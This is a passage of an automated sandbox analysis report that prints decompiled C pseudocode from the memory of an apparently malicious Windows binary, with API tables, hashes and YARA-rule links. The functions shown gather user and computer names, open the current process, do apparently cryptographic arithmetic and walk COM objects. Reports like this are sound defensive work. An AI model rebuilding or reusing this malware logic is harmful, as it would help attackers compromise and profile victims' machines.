							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E00F155DC((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xf1d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                            0x00f1a913
                            0x00f1a91a
                            0x00f1a91f
                            0x00f1a922
                            0x00f1a929
                            0x00f1a92c
                            0x00f1a92f
                            0x00f1a936
                            0x00f1a939
                            0x00f1aa8d
                            0x00f1aa8f
                            0x00f1aa91
                            0x00f1aa96
                            0x00f1aa96
                            0x00f1a93f
                            0x00f1a942
                            0x00f1a945
                            0x00f1a947
                            0x00f1a947
                            0x00f1a94b
                            0x00000000
                            0x00000000
                            0x00f1a94f
                            0x00f1a97b
                            0x00f1a980
                            0x00f1a982
                            0x00f1a982
                            0x00f1a985
                            0x00f1a988
                            0x00f1a988
                            0x00f1a98a
                            0x00000000
                            0x00f1a955
                            0x00f1a957
                            0x00f1a976
                            0x00f1a976
                            0x00f1a98d
                            0x00f1a98d
                            0x00f1a98e
                            0x00f1a98e
                            0x00f1a991
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1a991
                            0x00f1a95b
                            0x00f1a9a2
                            0x00f1a9a6
                            0x00f1aa80
                            0x00f1aa82
                            0x00f1aa82
                            0x00f1aa83
                            0x00f1aa86
                            0x00000000
                            0x00f1aa86
                            0x00f1a9af
                            0x00f1a9c0
                            0x00f1a9c4
                            0x00f1aa7c
                            0x00000000
                            0x00f1aa7c
                            0x00f1a9ca
                            0x00f1a9cd
                            0x00f1a9d1
                            0x00f1a9d7
                            0x00f1a9da
                            0x00f1aa72
                            0x00f1aa72
                            0x00000000
                            0x00f1aa78
                            0x00f1a9e5
                            0x00f1a9ee
                            0x00f1aa02
                            0x00f1aa09
                            0x00f1aa1e
                            0x00f1aa24
                            0x00f1aa2c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1aa2e
                            0x00f1aa2e
                            0x00f1aa2e
                            0x00f1aa35
                            0x00f1aa3d
                            0x00000000
                            0x00000000
                            0x00f1aa3f
                            0x00f1aa48
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1aa4a
                            0x00f1aa4c
                            0x00f1aa4f
                            0x00f1aa4f
                            0x00f1aa52
                            0x00f1aa56
                            0x00f1aa59
                            0x00f1aa5f
                            0x00f1aa62
                            0x00f1aa69
                            0x00000000
                            0x00f1a9e5
                            0x00f1a960
                            0x00f1a96b
                            0x00f1a96e
                            0x00f1a970
                            0x00f1a970
                            0x00f1a973
                            0x00f1a975
                            0x00000000
                            0x00f1a975
                            0x00f1a94f
                            0x00f1a995
                            0x00f1a99a
                            0x00f1a99c
                            0x00f1a99c
                            0x00f1a99f
                            0x00f1a99f
                            0x00000000

                            APIs
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00F1AA09
                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 00F1AA1E
                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00F1AA35
                            • lstrlen.KERNEL32(69B25F45), ref: 00F1AA59
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            • Opcode ID: 5b244b0290d34e87c381dd8fd69f0d38b16aa25c9fa2e7b69f3211a818e8c0a9
                            • Instruction ID: 2be14c22b904270d376140b068e409a131162cf4c6a1a3025c3afffece12d6d7
                            • Opcode Fuzzy Hash: 5b244b0290d34e87c381dd8fd69f0d38b16aa25c9fa2e7b69f3211a818e8c0a9
                            • Instruction Fuzzy Hash: 1751C231E01108EFCF11CF99C9847EDBBB6FF45320F16809AE8559B211C774AA81EB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F18941, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F18941() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x75145522
						_v12 = _v12 + _t11;
						_t63 = E00F155DC(_v12 + _t11 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E00F16DFA(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xf1642f
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                            0x00f1894f
                            0x00f18952
                            0x00f18955
                            0x00f1895b
                            0x00f18960
                            0x00f18966
                            0x00f1896e
                            0x00f18971
                            0x00f18977
                            0x00f1897c
                            0x00f18985
                            0x00f18989
                            0x00f18996
                            0x00f1899a
                            0x00f1899c
                            0x00f189a0
                            0x00f189a3
                            0x00f189b3
                            0x00f18a05
                            0x00f18a06
                            0x00f189b5
                            0x00f189b8
                            0x00f189bf
                            0x00f189c2
                            0x00f189d5
                            0x00000000
                            0x00f189d7
                            0x00f189da
                            0x00f189df
                            0x00f189ed
                            0x00f189f0
                            0x00f189f8
                            0x00f189fb
                            0x00000000
                            0x00f189fd
                            0x00f189fd
                            0x00f18a00
                            0x00f18a00
                            0x00f189fb
                            0x00f189d5
                            0x00f18a0b
                            0x00f18a0c
                            0x00f1897c
                            0x00f18a12

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,00F1642D), ref: 00F18955
                            • GetComputerNameW.KERNEL32(00000000,00F1642D), ref: 00F18971
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetUserNameW.ADVAPI32(00000000,00F1642D), ref: 00F189AB
                            • GetComputerNameW.KERNEL32(00F1642D,75145520), ref: 00F189CD
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00F1642D,00000000,00F1642F,00000000,00000000,?,75145520,00F1642D), ref: 00F189F0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: b8c42a3d335ffda85f9bfe935615ec38bb599190075aa0a792c4232822c18775
                            • Instruction ID: 64c76135056add4dcaa86e5ff6aa5be5dd58d1b5a99fc2723a9de28d79ed881e
                            • Opcode Fuzzy Hash: b8c42a3d335ffda85f9bfe935615ec38bb599190075aa0a792c4232822c18775
                            • Instruction Fuzzy Hash: 1121C876D00249FFCB11DFA9C9858EEBBB8EF48344B5584AAE501E7200DB359F45EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F12CBF, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F12CBF(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xf1d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xf1d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0xf1d290 = _t6;
					 *0xf1d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xf1d28c = _t7;
					if(_t7 == 0) {
						 *0xf1d28c =  *0xf1d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                            0x00f12cc7
                            0x00f12ccf
                            0x00f12cd4
                            0x00000000
                            0x00f12d29
                            0x00f12cd6
                            0x00f12cde
                            0x00f12ce6
                            0x00f12ce6
                            0x00f12d26
                            0x00000000
                            0x00f12d26
                            0x00f12ce8
                            0x00f12ce8
                            0x00f12ced
                            0x00f12cff
                            0x00f12d04
                            0x00f12d0a
                            0x00f12d12
                            0x00f12d17
                            0x00f12d19
                            0x00f12d19
                            0x00000000
                            0x00f12d20
                            0x00f12ce2
                            0x00000000
                            0x00000000
                            0x00f12ce4
                            0x00000000

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00F1233B,?), ref: 00F12CC7
                            • GetVersion.KERNEL32 ref: 00F12CD6
                            • GetCurrentProcessId.KERNEL32 ref: 00F12CED
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00F12D0A
                            • GetLastError.KERNEL32 ref: 00F12D29
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: 49b15d54480f165129175e5d85f9fa90c26f6341015c0d6a62538993041e6be1
                            • Instruction ID: bac03dfc2e99968cde1e4b6367b09e8c29e553fabad353d429134e0fa5f9423a
                            • Opcode Fuzzy Hash: 49b15d54480f165129175e5d85f9fa90c26f6341015c0d6a62538993041e6be1
                            • Instruction Fuzzy Hash: 5CF04970A8034DDFE7A49FA4ED097E53BB1AB08761F12C519E626D71E4D3708491BF28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F142E6, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 00F14327
                            • SysFreeString.OLEAUT32(?), ref: 00F1440A
                              • Part of subcall function 00F152A1: SysAllocString.OLEAUT32(00F1C2B0), ref: 00F152F1
                            • SafeArrayDestroy.OLEAUT32(?), ref: 00F1445E
                            • SysFreeString.OLEAUT32(?), ref: 00F1446C
                              • Part of subcall function 00F12C14: Sleep.KERNEL32(000001F4), ref: 00F12C5C
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                            • String ID:
                            • API String ID: 3193056040-0
                            • Opcode ID: 8c8002d91d2e2af396e8082dfde9808f2ade2a2c0c853211ebca3efb8c95bacb
                            • Instruction ID: c6b9ee268fee12789768c38a078ee523c1ff9bb0826224ce09657b2dda448eb8
                            • Opcode Fuzzy Hash: 8c8002d91d2e2af396e8082dfde9808f2ade2a2c0c853211ebca3efb8c95bacb
                            • Instruction Fuzzy Hash: 37513E72900249EFCB00DFE4C8849EEB7B6FF88310B158828E915EB224D775AD85DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F152A1, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 45%
                            			E00F152A1(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xf1d2b8; // 0x48da5a8
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t102 + 0xf1e038,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xf1c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xf1d2b8; // 0x48da5a8
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t108 + 0xf1e0bc,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xf1d2b8; // 0x48da5a8
														if(lstrcmpW(_v12, _t78 + 0xf1e078) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                            0x00f152a6
                            0x00f152af
                            0x00f152b0
                            0x00f152b4
                            0x00f152ba
                            0x00f152c0
                            0x00f152c9
                            0x00f152d9
                            0x00f152db
                            0x00f152e1
                            0x00f152e6
                            0x00f152f1
                            0x00f152f9
                            0x00f152fc
                            0x00f1541f
                            0x00f15302
                            0x00f15302
                            0x00f1530f
                            0x00f15315
                            0x00f1531b
                            0x00f1531f
                            0x00f15325
                            0x00f15332
                            0x00f15336
                            0x00f1533c
                            0x00f1533f
                            0x00f15345
                            0x00f1534b
                            0x00f15351
                            0x00f15354
                            0x00f15357
                            0x00f1535d
                            0x00f15366
                            0x00f1536c
                            0x00f1536d
                            0x00f15370
                            0x00f15371
                            0x00f15372
                            0x00f1537a
                            0x00f1537b
                            0x00f1537c
                            0x00f1537e
                            0x00f15382
                            0x00f15386
                            0x00000000
                            0x00000000
                            0x00f1538c
                            0x00f15395
                            0x00f153a5
                            0x00f153a9
                            0x00f153ab
                            0x00f153b8
                            0x00f153bc
                            0x00f153c4
                            0x00f153db
                            0x00f153dd
                            0x00f153e3
                            0x00f153e3
                            0x00f153ec
                            0x00f153ec
                            0x00f153ee
                            0x00f153f4
                            0x00f153f4
                            0x00f153f7
                            0x00f153fd
                            0x00f15400
                            0x00f15409
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f15409
                            0x00f1535d
                            0x00f15357
                            0x00f1533f
                            0x00f1540f
                            0x00f1540f
                            0x00f15415
                            0x00f15415
                            0x00f1541b
                            0x00f1541b
                            0x00f15424
                            0x00f1542a
                            0x00f1542a
                            0x00f152e6
                            0x00f15433

                            APIs
                            • SysAllocString.OLEAUT32(00F1C2B0), ref: 00F152F1
                            • lstrcmpW.KERNEL32(00000000,?), ref: 00F153D3
                            • SysFreeString.OLEAUT32(00000000), ref: 00F153EC
                            • SysFreeString.OLEAUT32(?), ref: 00F1541B
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$Free$Alloclstrcmp
                            • String ID:
                            • API String ID: 1885612795-0
                            • Opcode ID: 7a4b1644df803639e20fc55577ccc4a7b1415b6ff64c842edae18758f2055b71
                            • Instruction ID: 0c6bb8cf11bee988d3eb6e0e29e7486ccb55cf2e1fca564b04c0299f0dfb9541
                            • Opcode Fuzzy Hash: 7a4b1644df803639e20fc55577ccc4a7b1415b6ff64c842edae18758f2055b71
                            • Instruction Fuzzy Hash: 89515171D00519EFCB00DFA8C8888EEF7B6FF88705B148598E915EB220D7769D81DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F12698, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E00F12698(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00F1455D(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00F16CD0(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00F121F3(_t101,  &_v428, _a8, _t96 - _t81);
					E00F121F3(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00F16CD0(_t101, 0xf1d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00F16CD0(_a16, _a4);
						E00F13213(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00F1B030();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00F1B02A();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00F13CAA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00F1675C(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00F19089(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xf1d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                            0x00f1269b
                            0x00f126a7
                            0x00f126ad
                            0x00f126b2
                            0x00f126b6
                            0x00f12828
                            0x00f1282c
                            0x00f1282c
                            0x00f126bc
                            0x00f126c0
                            0x00f126c6
                            0x00f126c7
                            0x00f126d2
                            0x00f126d8
                            0x00f126dd
                            0x00f126e0
                            0x00f126fa
                            0x00f12709
                            0x00f12715
                            0x00f1271f
                            0x00f12724
                            0x00f12726
                            0x00f12729
                            0x00f127e0
                            0x00f127e6
                            0x00f127f7
                            0x00f1280a
                            0x00f12820
                            0x00000000
                            0x00f12825
                            0x00f12732
                            0x00f12739
                            0x00f1273d
                            0x00f12743
                            0x00f12745
                            0x00f12747
                            0x00f12749
                            0x00f1274b
                            0x00f12755
                            0x00f1275a
                            0x00f1275c
                            0x00f1275e
                            0x00f1275f
                            0x00f12760
                            0x00f12761
                            0x00f12768
                            0x00f1276f
                            0x00f12772
                            0x00f12772
                            0x00f1273f
                            0x00f1273f
                            0x00f1273f
                            0x00f1277a
                            0x00f12782
                            0x00f1278e
                            0x00f12793
                            0x00f12793
                            0x00f12798
                            0x00000000
                            0x00000000
                            0x00f1279a
                            0x00f1279d
                            0x00f127aa
                            0x00000000
                            0x00000000
                            0x00f127ac
                            0x00f127ac
                            0x00f127b9
                            0x00f12793
                            0x00f12798
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f12798
                            0x00f127c3
                            0x00f127c6
                            0x00f127c9
                            0x00f127d0
                            0x00f127d0
                            0x00f127dd
                            0x00000000
                            0x00f127dd
                            0x00f126c9
                            0x00f126cd
                            0x00f126ce
                            0x00f126d0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f126d0
                            0x00000000

                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00F1274B
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00F12761
                            • memset.NTDLL ref: 00F1280A
                            • memset.NTDLL ref: 00F12820
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: 0d96a10a8e4df3ea16314ad47652c6fcad0cfddaeee599224217c3c5c4798244
                            • Instruction ID: 5f546b2b332ecc26ce5fdba51e660fa66e7cee7d941dda203186799086c67286
                            • Opcode Fuzzy Hash: 0d96a10a8e4df3ea16314ad47652c6fcad0cfddaeee599224217c3c5c4798244
                            • Instruction Fuzzy Hash: 3441A131B00219AFDB109FA8CC41BEE7779EF45320F104569B919A71C1DB74AEA4AB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F17796, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00F17796(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00F155DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                            0x00f177a2
                            0x00f177a6
                            0x00f177a7
                            0x00f177a8
                            0x00f177aa
                            0x00f177ac
                            0x00f177b1
                            0x00f177b4
                            0x00f1784b
                            0x00f17852
                            0x00f17852
                            0x00f177bd
                            0x00f177c4
                            0x00f177d4
                            0x00f177d4
                            0x00f177da
                            0x00f177dc
                            0x00f177e1
                            0x00f177ea
                            0x00f177f2
                            0x00f177f5
                            0x00f17800
                            0x00f17804
                            0x00f17806
                            0x00f17807
                            0x00f17810
                            0x00f17814
                            0x00f17825
                            0x00f17816
                            0x00f1781b
                            0x00f17820
                            0x00f1782f
                            0x00f1782f
                            0x00f17804
                            0x00f17835
                            0x00f1783b
                            0x00f1783b
                            0x00f17844
                            0x00f17849
                            0x00f17849
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
